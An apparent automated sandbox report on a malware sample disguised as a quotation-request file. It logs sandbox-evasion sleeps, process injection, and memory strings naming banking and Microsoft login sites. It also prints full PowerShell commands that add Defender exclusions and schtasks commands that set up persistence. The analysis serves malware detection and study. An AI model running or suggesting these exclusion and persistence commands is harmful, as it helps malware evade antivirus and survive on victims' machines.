Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864 Thread sleep time: -597203s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864 Thread sleep time: -597093s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864 Thread sleep time: -596984s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864 Thread sleep time: -596874s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864 Thread sleep time: -596765s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864 Thread sleep time: -596656s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864 Thread sleep time: -596546s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864 Thread sleep time: -596437s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864 Thread sleep time: -596328s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864 Thread sleep time: -596218s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864 Thread sleep time: -596030s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864 Thread sleep time: -595921s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864 Thread sleep time: -595774s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864 Thread sleep time: -595504s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864 Thread sleep time: -595375s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864 Thread sleep time: -595265s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864 Thread sleep time: -595156s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864 Thread sleep time: -595046s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864 Thread sleep time: -594936s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864 Thread sleep time: -594828s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864 Thread sleep time: -594718s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864 Thread sleep time: -594609s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864 Thread sleep time: -594500s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864 Thread sleep time: -594390s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864 Thread sleep time: -594281s >= -30000s
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696428655
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696428655
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696428655
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696428655o
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: jnqeRRexnD.exe, 0000000E.00000002.4515858199.000000000139E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll1
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696428655f
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696428655j
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4516378063.0000000001346000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696428655s
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696428655f
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696428655s
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696428655o
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696428655j
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696428655
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 14_2_06DB9548 LdrInitializeThunk, 14_2_06DB9548
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe"
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\jnqeRRexnD.exe"
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe"
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\jnqeRRexnD.exe"
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Memory written: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Memory written: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe"
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\jnqeRRexnD.exe"
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jnqeRRexnD" /XML "C:\Users\user\AppData\Local\Temp\tmp2F66.tmp"
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Process created: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe"
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jnqeRRexnD" /XML "C:\Users\user\AppData\Local\Temp\tmp42C0.tmp"
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Process created: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe "C:\Users\user\AppData\Roaming\jnqeRRexnD.exe"
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Queries volume information: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe VolumeInformation
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
